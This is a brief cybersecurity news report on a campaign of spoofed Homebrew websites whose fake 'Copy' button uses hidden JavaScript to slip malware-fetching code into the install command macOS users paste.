Cybercriminals are targeting macOS users through fake Homebrew package manager websites that look identical to the real thing. The attackers created convincing replicas of brew.sh using domains like homebrewfaq.org and homebrewclubs.org.
When users visit these spoofed sites to install Homebrew, hidden JavaScript code manipulates their clipboard without permission. Instead of copying just the legitimate installation command, the fake "Copy" button secretly adds malicious code that downloads additional payloads from attacker-controlled servers.
The scam is particularly clever because it runs malicious commands in the background while the real Homebrew installation proceeds normally, making detection difficult. This represents a new twist on supply chain attacks by targeting the installation process rather than compromising official repositories.
Source: Cybersecurity News